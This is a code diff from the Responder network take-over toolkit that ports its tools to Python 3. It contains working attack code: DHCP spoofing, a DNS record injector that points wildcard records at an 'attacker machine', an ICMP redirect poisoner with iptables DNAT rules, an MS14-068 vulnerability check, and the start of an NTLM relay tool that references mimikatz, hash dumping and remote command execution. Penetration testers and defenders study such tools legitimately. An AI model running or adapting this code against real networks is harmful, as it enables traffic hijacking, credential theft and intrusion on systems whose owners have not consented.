+    return SrcIP, SrcPort, DstIP, DstPort
 
 def FindIP(data):
-	IP = ''.join(re.findall(r'(?<=\x32\x04)[^EOF]*', data))
-	return ''.join(IP[0:4])
+    data = data.decode('latin-1')
+    IP = ''.join(re.findall(r'(?<=\x32\x04)[^EOF]*', data))
+    return ''.join(IP[0:4]).encode('latin-1')
 
 def ParseDHCPCode(data):
-	PTid        = data[4:8]
-	Seconds     = data[8:10]
-	CurrentIP   = socket.inet_ntoa(data[12:16])
-	RequestedIP = socket.inet_ntoa(data[16:20])
-	MacAddr     = data[28:34]
-	MacAddrStr  = ':'.join('%02x' % ord(m) for m in MacAddr).upper()
-	OpCode      = data[242:243]
-	RequestIP   = data[245:249]
+    PTid        = data[4:8]
+    Seconds     = data[8:10]
+    CurrentIP   = socket.inet_ntoa(data[12:16])
+    RequestedIP = socket.inet_ntoa(data[16:20])
+    MacAddr     = data[28:34]
+    MacAddrStr  = ':'.join('%02x' % ord(m) for m in MacAddr.decode('latin-1')).upper()
+    OpCode      = data[242:243]
+    RequestIP   = data[245:249]
 
-	# DHCP Inform
-	if OpCode == "\x08": 
-		IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=socket.inet_aton(CurrentIP))
-		Packet = DHCPInformACK(Tid=PTid, ClientMac=MacAddr, ActualClientIP=socket.inet_aton(CurrentIP),
-								GiveClientIP=socket.inet_aton("0.0.0.0"),
-								NextServerIP=socket.inet_aton("0.0.0.0"),
-								RelayAgentIP=socket.inet_aton("0.0.0.0"),
-								ElapsedSec=Seconds)
-		Packet.calculate()
-		Buffer = UDP(Data = Packet)
-		Buffer.calculate()
-		SendDHCP(str(IP_Header)+str(Buffer), (CurrentIP, 68))
-		return 'Acknowledged DHCP Inform for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
-	elif OpCode == "\x03" and Respond_To_Requests:  # DHCP Request
-		IP = FindIP(data)
-		if IP:
-			IPConv = socket.inet_ntoa(IP)
-			if RespondToThisIP(IPConv):
-				IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP)
-				Packet = DHCPACK(Tid=PTid, ClientMac=MacAddr, GiveClientIP=IP, ElapsedSec=Seconds)
-				Packet.calculate()
-				Buffer = UDP(Data = Packet)
-				Buffer.calculate()
-				SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68))
-				return 'Acknowledged DHCP Request for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
-	elif OpCode == "\x01" and Respond_To_Requests:  # DHCP Discover
-		IP = FindIP(data)
-		if IP:
-			IPConv = socket.inet_ntoa(IP)
-			if RespondToThisIP(IPConv):
-				IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP)
-				Packet = DHCPACK(Tid=PTid, ClientMac=MacAddr, GiveClientIP=IP, DHCPOpCode="\x02", ElapsedSec=Seconds)
-				Packet.calculate()
-				Buffer = UDP(Data = Packet)
-				Buffer.calculate()
-				SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0))
-				return 'Acknowledged DHCP Discover for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
+    # DHCP Inform
+    if OpCode == b"\x08":
+        IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)).decode('latin-1'), DstIP=socket.inet_aton(CurrentIP))
+        Packet = DHCPInformACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), ActualClientIP=socket.inet_aton(CurrentIP).decode('latin-1'),
+                                                        GiveClientIP=socket.inet_aton("0.0.0.0").decode('latin-1'),
+                                                        NextServerIP=socket.inet_aton("0.0.0.0").decode('latin-1'),
+                                                        RelayAgentIP=socket.inet_aton("0.0.0.0").decode('latin-1'),
+                                                        ElapsedSec=Seconds.decode('latin-1'))
+        Packet.calculate()
+        Buffer = UDP(Data = Packet)
+        Buffer.calculate()
+        SendDHCP(str(IP_Header)+str(Buffer), (CurrentIP, 68))
+        return 'Acknowledged DHCP Inform for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, RequestedIP, MacAddrStr)
+
+    elif OpCode == b"\x03" and Respond_To_Requests:  # DHCP Request
+        IP = FindIP(data)
+        if IP:
+            IPConv = socket.inet_ntoa(IP)
+            if RespondToThisIP(IPConv):
+                IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)).decode('latin-1'), DstIP=IP.decode('latin-1'))
+                Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), ElapsedSec=Seconds.decode('latin-1'))
+                Packet.calculate()
+                Buffer = UDP(Data = Packet)
+                Buffer.calculate()
+                SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68))
+                return 'Acknowledged DHCP Request for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, RequestedIP, MacAddrStr)
+
+    elif OpCode == b"\x01" and Respond_To_Requests:  # DHCP Discover
+        IP = FindIP(data)
+        if IP:
+            IPConv = socket.inet_ntoa(IP)
+            if RespondToThisIP(IPConv):
+                IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP)
+                Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), DHCPOpCode="\x02", ElapsedSec=Seconds.decode('latin-1'))
+                Packet.calculate()
+                Buffer = UDP(Data = Packet)
+                Buffer.calculate()
+                SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0))
+                return 'Acknowledged DHCP Discover for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, RequestedIP, MacAddrStr)
 
 def SendDHCP(packet,Host):
-	s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
-	s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
-	s.sendto(packet, Host)
+    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
+    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
+    s.sendto(NetworkSendBufferPython2or3(packet), Host)
 
 if __name__ == "__main__":
-	s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
-	s.bind((Interface, 0x0800))
+    s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
+    s.bind((Interface, 0x0800))
 
-	while True:
-		try:
-			data = s.recvfrom(65535)
-			if data[0][23:24] == "\x11":  # is udp?
-				SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data)
+    while True:
+        try:
+            data = s.recvfrom(65535)
+            if data[0][23:24] == b"\x11":  # is udp?
+                SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data)
 
-				if SrcPort == 67 or DstPort == 67:
-					ret = ParseDHCPCode(data[0][42:])
-					if ret:
-						print text("[DHCP] %s" % ret)
-
-		except KeyboardInterrupt:
-			sys.exit("\r%s Exiting..." % color('[*]', 2, 1))
+                if SrcPort == 67 or DstPort == 67:
+                    ret = ParseDHCPCode(data[0][42:])
+                    if ret:
+                        print(text("[DHCP] %s" % ret))
 
+        except KeyboardInterrupt:
+            sys.exit("\r%s Exiting..." % color('[*]', 2, 1))

tools/DNSUpdate.py

@@ -0,0 +1,185 @@
+#!/usr/bin/env python
+
+import sys
+import argparse
+import getpass
+import re
+import socket
+from impacket.structure import Structure
+import ldap3
+import dns.resolver
+from collections import defaultdict
+
+
+class DNS_RECORD(Structure):
+    """
+    dnsRecord - used in LDAP [MS-DNSP] section 2.3.2.2
+    impacket based structure, all of the below are tuples in format (fieldName, format)
+    """
+    structure = (
+        ('DataLength', '<H-Data'),
+        ('Type', '<H'),
+        ('Version', 'B=5'),
+        ('Rank', 'B'),
+        ('Flags', '<H=0'),
+        ('Serial', '<L'),
+        ('TtlSeconds', '>L'),
+        ('Reserved', '<L=0'),
+        ('TimeStamp', '<L=0'),
+        ('Data', ':')
+    )
+
+
+class DNS_RPC_RECORD_A(Structure):
+    """
+    DNS_RPC_RECORD_A [MS-DNSP] section 2.2.2.2.4.1
+    impacket based structure, all of the below are tuples in format (fieldName, format)
+    """
+    structure = (
+        ('address', ':'),
+    )
+
+class DNS_RPC_RECORD_TS(Structure):
+    """
+    DNS_RPC_RECORD_TS [MS-DNSP] section 2.2.2.2.4.23
+    impacket based structure, all of the below are tuples in format (fieldName, format)
+    """
+    structure = (
+        ('entombedTime', '<Q'),
+    )
+
+def getserial(server, zone):
+    dnsresolver = dns.resolver.Resolver()
+    try:
+        socket.inet_aton(server)
+        dnsresolver.nameservers = [server]
+    except socket.error:
+        pass
+    res = dnsresolver.query(zone, 'SOA')
+    for answer in res:
+        return answer.serial + 1
+
+def new_A_record(type, serial):
+    nr = DNS_RECORD()
+    nr['Type'] = type
+    nr['Serial'] = serial
+    nr['TtlSeconds'] = 180
+    nr['Rank'] = 240
+    return nr
+
+ddict1 = defaultdict(list)
+
+parser = argparse.ArgumentParser(description='Add/ Remove DNS records for an effective pawning with responder')
+    
+parser.add_argument("-DNS", type=str,help="IP address of the DNS server/ Domain Controller to connect to")
+parser.add_argument("-u","--user",type=str,help="Domain\\Username for authentication.")
+parser.add_argument("-p","--password",type=str,help="Password or LM:NTLM hash, will prompt if not specified")
+parser.add_argument("-a", "--action", type=str, help="ad, rm, or an: add, remove, analyze")
+parser.add_argument("-r", "--record", type=str, help="DNS record name")
+parser.add_argument("-d", "--data", help="The IP address of attacker machine")
+parser.add_argument("-l", "--logfile", type=str, help="The log file of Responder in analyze mode")
+
+
+
+args = parser.parse_args()
+#Checking Username and Password
+if args.user is not None:
+    if not '\\' in args.user:
+        print('Username must include a domain, use: Domain\\username')
+        sys.exit(1)
+    if args.password is None:
+        args.password = getpass.getpass()
+
+#Check the required arguments
+if args.action in ['ad', 'rm']:
+    if args.action == 'ad' and not args.record:
+        flag = input("No record provided, Enter 'Y' to add a Wildcard record: ")
+        if flag.lower() == 'y' or flag.lower() == 'yes':
+            recordname = "*"
+        else:
+            sys.exit(1)     
+    else:
+        recordname = args.record
+    if args.action == 'ad' and not args.data:
+        print("Provide an IP address with argument -d")
+        sys.exit(1)
+    if args.action == "rm" and not args.record:
+        print("No record provided to be deleted")
+elif args.action == "an":
+    if args.logfile:
+        with open(args.logfile) as infile:
+            for lline in infile:
+                templist = lline.split(":")
+                tempIP = templist[2].split( )[0]
+                tempRecord = templist[3].split( )[0]
+                ddict1[tempRecord].append(tempIP)
+        infile.close()
+        for k,v in ddict1.items():
+            print("The request %s was made by %s hosts" % (k, len(set(v))))
+        sys.exit(0)
+    else:
+        print("Provide a log file from responder session in analyze mode")
+        sys.exit(1)
+else:
+    print("Choose one of the three actions")
+    sys.exit(1)
+
+#inital connection
+dnserver = ldap3.Server(args.DNS, get_info=ldap3.ALL)
+print('Connecting to host...')
+con = ldap3.Connection(dnserver, user=args.user, password=args.password, authentication=ldap3.NTLM)
+print('Binding to host')
+# Binding with the user context 
+if not con.bind():
+    print('Bind failed, Check the Username and Password')
+    print(con.result)
+    sys.exit(1)
+print('Bind OK')
+
+#Configure DN for the record, gather domainroot, dnsroot, zone
+domainroot = dnserver.info.other['defaultNamingContext'][0]
+dnsroot = 'CN=MicrosoftDNS,DC=DomainDnsZones,%s' % domainroot
+zone = re.sub(',DC=', '.', domainroot[domainroot.find('DC='):], flags=re.I)[3:]
+if recordname.lower().endswith(zone.lower()):
+    recordname = recordname[:-(len(zone)+1)]
+record_dn = 'DC=%s,DC=%s,%s' % (recordname, zone, dnsroot)
+
+if args.action == 'ad':
+    record = new_A_record(1, getserial(args.DNS, zone))
+    record['Data'] = DNS_RPC_RECORD_A()
+    record['Data'] = socket.inet_aton(args.data)
+
+    #Adding the data to record object
+    recorddata = {
+        #'objectClass': ['top', 'dnsNode'],
+        'dNSTombstoned': False,
+        'name': recordname,
+        'dnsRecord': [record.getData()]
+        }
+    objectClass = ['top', 'dnsNode']
+
+    print('Adding the record')
+
+    con.add(record_dn, objectClass, recorddata)
+    #con.add(record_dn, ['top', 'dnsNode'], recorddata)
+    print(con.result)
+
+elif args.action == 'rm':
+    #searching for the record
+    searchbase = 'DC=%s,%s' % (zone, dnsroot)
+    con.search(searchbase, '(&(objectClass=dnsNode)(name=%s))' % ldap3.utils.conv.escape_filter_chars(recordname), attributes=['dnsRecord','dNSTombstoned','name'])
+    if len(con.response) != 0:
+        for entry in con.response:
+            if entry['type'] != 'searchResEntry':
+                print("Provided record does not exists")
+                sys.exit(1)
+            else:
+                record_dn = entry['dn']
+                print(entry['raw_attributes']['dnsRecord'])
+    else:
+        print("Provided record does not exists")
+
+    con.delete(record_dn)
+    if con.result['description'] == "success":
+        print("Record deleted successfully")
+        

tools/FindSMB2UPTime.py

@@ -1,68 +0,0 @@
-#!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
-# created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import sys
-import os
-import datetime
-import struct
-import socket
-
-sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '..')))
-from packets import SMB2Header, SMB2Nego, SMB2NegoData
-
-def GetBootTime(data):
-    Filetime = int(struct.unpack('<q',data)[0])
-    t = divmod(Filetime - 116444736000000000, 10000000)
-    time = datetime.datetime.fromtimestamp(t[0])
-    return time, time.strftime('%Y-%m-%d %H:%M:%S')
-
-
-def IsDCVuln(t):
-    Date = datetime.datetime(2014, 11, 17, 0, 30)
-    if t[0] < Date:
-       print "DC is up since:", t[1]
-       print "This DC is vulnerable to MS14-068"
-    print "DC is up since:", t[1]
-
-
-def run(host):
-    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    s.connect(host)  
-    s.settimeout(5) 
-
-    Header = SMB2Header(Cmd="\x72",Flag1="\x18",Flag2="\x53\xc8")
-    Nego = SMB2Nego(Data = SMB2NegoData())
-    Nego.calculate()
-
-    Packet = str(Header)+str(Nego)
-    Buffer = struct.pack(">i", len(Packet)) + Packet
-    s.send(Buffer)
-
-    try:
-        data = s.recv(1024)
-        if data[4:5] == "\xff":
-           print "This host doesn't support SMBv2" 
-        if data[4:5] == "\xfe":
-           IsDCVuln(GetBootTime(data[116:124]))
-    except Exception:
-        s.close()
-        raise
-
-if __name__ == "__main__":
-    if len(sys.argv)<=1:
-        sys.exit('Usage: python '+sys.argv[0]+' DC-IP-address')
-    host = sys.argv[1],445
-    run(host)

tools/FindSQLSrv.py

@@ -1,5 +1,5 @@
 #!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
+# This file is part of Responder, a network take-over set of tools
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
 # This program is free software: you can redistribute it and/or modify
@@ -16,25 +16,23 @@
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 from socket import *
 
-print 'MSSQL Server Finder 0.1'
+print('MSSQL Server Finder 0.3')
 
 s = socket(AF_INET,SOCK_DGRAM)
 s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
-s.settimeout(2)
-s.sendto('\x02',('255.255.255.255',1434))
+s.settimeout(5)
+s.sendto(b'\x02',('255.255.255.255',1434))
 
 try:
-   while 1:
-      data, address = s.recvfrom(8092)
-      if not data:
-         break
-      else:
-         print "==============================================================="
-         print "Host details:",address[0]
-         print data[2:]
-         print "==============================================================="
-         print ""
+    while 1:
+        data, address = s.recvfrom(8092)
+        if not data:
+            break
+        else:
+            print("===============================================================")
+            print(("Host details: %s"%(address[0])))
+            print((data[2:]).decode('latin-1'))
+            print("===============================================================")
+            print("")
 except:
-   pass
-
-
+    pass

tools/Icmp-Redirect.py

@@ -1,5 +1,5 @@
 #!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
+# This file is part of Responder, a network take-over set of tools
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
 # This program is free software: you can redistribute it and/or modify
@@ -19,14 +19,16 @@ import struct
 import optparse
 import pipes
 import sys
+import codecs
 from socket import *
 sys.path.append('../')
 from odict import OrderedDict
 from random import randrange
 from time import sleep
 from subprocess import call
-from packets import Packet
 
+if (sys.version_info < (3, 0)):
+   sys.exit('This script is meant to be run with Python3')
 parser = optparse.OptionParser(usage='python %prog -I eth0 -i 10.20.30.40 -g 10.20.30.254 -t 10.20.30.48 -r 10.20.40.1',
                                prog=sys.argv[0],
                                )
@@ -40,23 +42,23 @@ parser.add_option('-a', '--alternate',action="store", help="The alternate gatewa
 options, args = parser.parse_args()
 
 if options.OURIP is None:
-    print "-i mandatory option is missing.\n"
+    print("-i mandatory option is missing.\n")
     parser.print_help()
     exit(-1)
 elif options.OriginalGwAddr is None:
-    print "-g mandatory option is missing, please provide the original gateway address.\n"
+    print("-g mandatory option is missing, please provide the original gateway address.\n")
     parser.print_help()
     exit(-1)
 elif options.VictimIP is None:
-    print "-t mandatory option is missing, please provide a target.\n"
+    print("-t mandatory option is missing, please provide a target.\n")
     parser.print_help()
     exit(-1)
 elif options.Interface is None:
-    print "-I mandatory option is missing, please provide your network interface.\n"
+    print("-I mandatory option is missing, please provide your network interface.\n")
     parser.print_help()
     exit(-1)
 elif options.ToThisHost is None:
-    print "-r mandatory option is missing, please provide a destination target.\n"
+    print("-r mandatory option is missing, please provide a destination target.\n")
     parser.print_help()
     exit(-1)
 
@@ -78,13 +80,53 @@ def Show_Help(ExtraHelpData):
 
 MoreHelp = "Note that if the target is Windows, the poisoning will only last for 10mn, you can re-poison the target by launching this utility again\nIf you wish to respond to the traffic, for example DNS queries your target issues, launch this command as root:\n\niptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst %s --dport 53 -j DNAT --to-destination %s:53\n\n"%(ToThisHost,OURIP)
 
+#Python version
+if (sys.version_info > (3, 0)):
+    PY2OR3     = "PY3"
+else:
+    PY2OR3  = "PY2"
+
+def StructWithLenPython2or3(endian,data):
+    #Python2...
+    if PY2OR3 == "PY2":
+        return struct.pack(endian, data)
+    #Python3...
+    else:
+        return struct.pack(endian, data).decode('latin-1')
+
+def NetworkSendBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return bytes(str(data), 'latin-1')
+
+def NetworkRecvBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return str(data.decode('latin-1'))
+
 def GenCheckSum(data):
     s = 0
     for i in range(0, len(data), 2):
         q = ord(data[i]) + (ord(data[i+1]) << 8)
         f = s + q
         s = (f & 0xffff) + (f >> 16)
-    return struct.pack("<H",~s & 0xffff)
+    return StructWithLenPython2or3("<H",~s & 0xffff)
+
+class Packet():
+	fields = OrderedDict([
+		("data", ""),
+	])
+	def __init__(self, **kw):
+		self.fields = OrderedDict(self.__class__.fields)
+		for k,v in kw.items():
+			if callable(v):
+				self.fields[k] = v(self.fields[k])
+			else:
+				self.fields[k] = v
+	def __str__(self):
+		return "".join(map(str, self.fields.values()))
 
 #####################################################################
 #ARP Packets
@@ -110,8 +152,8 @@ class ARPWhoHas(Packet):
     ])
 
     def calculate(self):
-        self.fields["DstIP"] = inet_aton(self.fields["DstIP"])
-        self.fields["SenderIP"] = inet_aton(OURIP)
+        self.fields["DstIP"] = inet_aton(self.fields["DstIP"]).decode('latin-1')
+        self.fields["SenderIP"] = inet_aton(OURIP).decode('latin-1')
 
 #####################################################################
 #ICMP Redirect Packets
@@ -141,11 +183,11 @@ class IPPacket(Packet):
 
     def calculate(self):
         self.fields["TID"] = chr(randrange(256))+chr(randrange(256))
-        self.fields["SrcIP"] = inet_aton(str(self.fields["SrcIP"]))
-        self.fields["DestIP"] = inet_aton(str(self.fields["DestIP"]))
+        self.fields["SrcIP"] = inet_aton(str(self.fields["SrcIP"])).decode('latin-1')
+        self.fields["DestIP"] = inet_aton(str(self.fields["DestIP"])).decode('latin-1')
         # Calc Len First
         CalculateLen = str(self.fields["VLen"])+str(self.fields["DifField"])+str(self.fields["Len"])+str(self.fields["TID"])+str(self.fields["Flag"])+str(self.fields["FragOffset"])+str(self.fields["TTL"])+str(self.fields["Cmd"])+str(self.fields["CheckSum"])+str(self.fields["SrcIP"])+str(self.fields["DestIP"])+str(self.fields["Data"])
-        self.fields["Len"] = struct.pack(">H", len(CalculateLen))
+        self.fields["Len"] = StructWithLenPython2or3(">H", len(CalculateLen))
         # Then CheckSum this packet
         CheckSumCalc =str(self.fields["VLen"])+str(self.fields["DifField"])+str(self.fields["Len"])+str(self.fields["TID"])+str(self.fields["Flag"])+str(self.fields["FragOffset"])+str(self.fields["TTL"])+str(self.fields["Cmd"])+str(self.fields["CheckSum"])+str(self.fields["SrcIP"])+str(self.fields["DestIP"])
         self.fields["CheckSum"] = GenCheckSum(CheckSumCalc)
@@ -160,7 +202,7 @@ class ICMPRedir(Packet):
     ])
 
     def calculate(self):
-        self.fields["GwAddr"] = inet_aton(OURIP)
+        self.fields["GwAddr"] = inet_aton(OURIP).decode('latin-1')
         CheckSumCalc =str(self.fields["Type"])+str(self.fields["OpCode"])+str(self.fields["CheckSum"])+str(self.fields["GwAddr"])+str(self.fields["Data"])
         self.fields["CheckSum"] = GenCheckSum(CheckSumCalc)
 
@@ -177,27 +219,27 @@ def ReceiveArpFrame(DstAddr):
     s.settimeout(5)
     Protocol = 0x0806
     s.bind((Interface, Protocol))
-    OurMac = s.getsockname()[4]
+    OurMac = s.getsockname()[4].decode('latin-1')
     Eth = EthARP(SrcMac=OurMac)
     Arp = ARPWhoHas(DstIP=DstAddr,SenderMac=OurMac)
     Arp.calculate()
     final = str(Eth)+str(Arp)
     try:
-        s.send(final)
+        s.send(NetworkSendBufferPython2or3(final))
         data = s.recv(1024)
         DstMac = data[22:28]
-        DestMac = DstMac.encode('hex')
-        PrintMac = ":".join([DestMac[x:x+2] for x in xrange(0, len(DestMac), 2)])
-        return PrintMac,DstMac
+        DestMac = codecs.encode(DstMac, 'hex')
+        PrintMac = ":".join([DestMac[x:x+2].decode('latin-1') for x in range(0, len(DestMac), 2)])
+        return PrintMac,DstMac.decode('latin-1')
     except:
-        print "[ARP]%s took too long to Respond. Please provide a valid host.\n"%(DstAddr)
+        print("[ARP]%s took too long to Respond. Please provide a valid host.\n"%(DstAddr))
         exit(1)
 
 def IcmpRedirectSock(DestinationIP):
     PrintMac,DestMac = ReceiveArpFrame(VictimIP)
-    print '[ARP]Target Mac address is :',PrintMac
+    print('[ARP]Target Mac address is :',PrintMac)
     PrintMac,RouterMac = ReceiveArpFrame(OriginalGwAddr)
-    print '[ARP]Router Mac address is :',PrintMac
+    print('[ARP]Router Mac address is :',PrintMac)
     s = socket(AF_PACKET, SOCK_RAW)
     Protocol = 0x0800
     s.bind((Interface, Protocol))
@@ -209,12 +251,12 @@ def IcmpRedirectSock(DestinationIP):
     IPPack = IPPacket(SrcIP=OriginalGwAddr,DestIP=VictimIP,TTL="\x40",Data=str(ICMPPack))
     IPPack.calculate()
     final = str(Eth)+str(IPPack)
-    s.send(final)
-    print '\n[ICMP]%s should have been poisoned with a new route for target: %s.\n'%(VictimIP,DestinationIP)
+    s.send(NetworkSendBufferPython2or3(final))
+    print('\n[ICMP]%s should have been poisoned with a new route for target: %s.\n'%(VictimIP,DestinationIP))
 
 def FindWhatToDo(ToThisHost2):
     if ToThisHost2 != None:
-        Show_Help('Hit CRTL-C to kill this script')
+        Show_Help('Hit CTRL-C to kill this script')
         RunThisInLoop(ToThisHost, ToThisHost2,OURIP)
     if ToThisHost2 == None:
         Show_Help(MoreHelp)
@@ -227,11 +269,11 @@ def RunThisInLoop(host, host2, ip):
     ouripadd = pipes.quote(ip)
     call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns1+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True)
     call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns2+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True)
-    print "[+]Automatic mode enabled\nAn iptable rules has been added for both DNS servers."
+    print("[+]Automatic mode enabled\nAn iptable rules has been added for both DNS servers.")
     while True:
         IcmpRedirectSock(DestinationIP=dns1)
         IcmpRedirectSock(DestinationIP=dns2)
-        print "[+]Repoisoning the target in 8 minutes..."
+        print("[+]Repoisoning the target in 8 minutes...")
         sleep(480)
 
 FindWhatToDo(ToThisHost2)

tools/MultiRelay.py

@@ -0,0 +1,853 @@
+#!/usr/bin/env python
+# -*- coding: latin-1 -*-
+# This file is part of Responder, a network take-over set of tools
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import sys
+if (sys.version_info > (3, 0)):
+    PY2OR3     = "PY3"
+else:
+    PY2OR3  = "PY2"
+    sys.exit("For now MultiRelay only supports python 3. Try python3 MultiRelay.py ...")
+import re
+import os
+import logging
+import optparse
+import time
+import random
+import subprocess
+from threading import Thread
+if PY2OR3 is "PY3":
+    from socketserver import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
+else:
+    from SocketServer import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
+
+try:
+    from Crypto.Hash import MD5
+except ImportError:
+    print("\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes.")
+    print("You can install it on debian based os with this command: apt-get install python-crypto")
+    print("The Sam file will be saved anyway and you will have the bootkey.\033[0m\n")
+try:
+    import readline
+except:
+    print("Warning: readline module is not available, you will not be able to use the arrow keys for command history")
+    pass
+from MultiRelay.RelayMultiPackets import *
+from MultiRelay.RelayMultiCore import *
+from SMBFinger.Finger import RunFinger,ShowSigning,RunPivotScan
+sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../')))
+from socket import *
+
+__version__ = "2.5"
+
+
+MimikatzFilename    = "./MultiRelay/bin/mimikatz.exe"
+Mimikatzx86Filename = "./MultiRelay/bin/mimikatz_x86.exe"
+RunAsFileName       = "./MultiRelay/bin/Runas.exe"
+SysSVCFileName      = "./MultiRelay/bin/Syssvc.exe"
+
+def color(txt, code = 1, modifier = 0):
+    return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
+
+if os.path.isfile(SysSVCFileName) is False:
+   print(color("[!]MultiRelay/bin/ folder is empty. You need to run these commands:\n",1,1))
+   print(color("apt-get install gcc-mingw-w64-x86-64",2,1))
+   print(color("x86_64-w64-mingw32-gcc ./MultiRelay/bin/Runas.c -o ./MultiRelay/bin/Runas.exe -municode -lwtsapi32 -luserenv",2,1))
+   print(color("x86_64-w64-mingw32-gcc ./MultiRelay/bin/Syssvc.c -o ./MultiRelay/bin/Syssvc.exe -municode",2,1))
+   print(color("\nAdditionally, you can add your custom mimikatz executables (mimikatz.exe and mimikatz_x86.exe)\nin the MultiRelay/bin/ folder for the mimi32/mimi command.",3,1))
+   sys.exit()
+
+def UserCallBack(op, value, dmy, parser):
+    args=[]
+    for arg in parser.rargs:
+        if arg[0] != "-":
+            args.append(arg)
+        if arg[0] == "-":
+            break
+    if getattr(parser.values, op.dest):
+        args.extend(getattr(parser.values, op.dest))
+    setattr(parser.values, op.dest, args)
+
+parser = optparse.OptionParser(usage="\npython %prog -t 10.20.30.40 -u Administrator lgandx admin\npython %prog -t 10.20.30.40 -u ALL", version=__version__, prog=sys.argv[0])
+parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET")
+parser.add_option('-p',action="store", help="Additional port to listen on, this will relay for proxy, http and webdav incoming packets.",metavar="8081",dest="ExtraPort")
+parser.add_option('-u', '--UserToRelay', help="Users to relay. Use '-u ALL' to relay all users.", action="callback", callback=UserCallBack, dest="UserToRelay")
+parser.add_option('-c', '--command', action="store", help="Single command to run (scripting)", metavar="whoami",dest="OneCommand")
+parser.add_option('-d', '--dump', action="store_true", help="Dump hashes (scripting)", metavar="whoami",dest="Dump")
+
+options, args = parser.parse_args()
+
+if options.TARGET is None:
+    print("\n-t Mandatory option is missing, please provide a target.\n")
+    parser.print_help()
+    exit(-1)
+if options.UserToRelay is None:
+    print("\n-u Mandatory option is missing, please provide a username to relay.\n")
+    parser.print_help()
+    exit(-1)
+if options.ExtraPort is None:
+    options.ExtraPort = 0
+
+if not os.geteuid() == 0:
+    print(color("[!] MultiRelay must be run as root."))
+    sys.exit(-1)
+
+OneCommand       = options.OneCommand
+Dump             = options.Dump
+ExtraPort        = options.ExtraPort
+UserToRelay      = options.UserToRelay
+
+Host             = [options.TARGET]
+Cmd              = []
+ShellOpen        = []
+Pivoting         = [2]
+
+def ShowWelcome():
+    print(color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1))
